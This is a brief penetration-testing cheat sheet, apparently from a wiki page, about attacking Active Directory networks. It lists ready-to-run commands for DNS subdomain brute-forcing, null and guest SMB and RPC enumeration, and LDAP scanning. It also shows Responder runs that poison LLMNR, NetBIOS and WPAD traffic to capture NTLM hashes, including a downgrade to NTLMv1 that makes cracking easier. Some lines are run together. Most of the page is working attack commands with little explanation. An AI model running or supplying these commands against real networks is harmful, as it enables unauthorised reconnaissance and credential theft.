Enumeration
Recon Activity:
Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.
gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txtCheck for null and Guest access on smb services (this won't work on modern Windows versions):
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //
rpcclient -U "" -N <IP> #No creds
smbclient --no-pass -L //<IP> # Null userEnumerate LDAP
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>ldapsearch
Check null credentials or if your credentials are valid:
Kerberoast
Poison the network
Running Responder
To run Responder with default settings:
responder -I <Interface>For more aggressive probing (with potential side effects):
responder -I <Interface> -P -r -vTechniques to capture NTLMv1 challenges/responses for easier cracking:
responder -I <Interface> --lm --disable-essWPAD impersonation can be activated with:
responder -I <Interface> --wpadNetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up:
responder.py -I <interface> -Pv
Last updated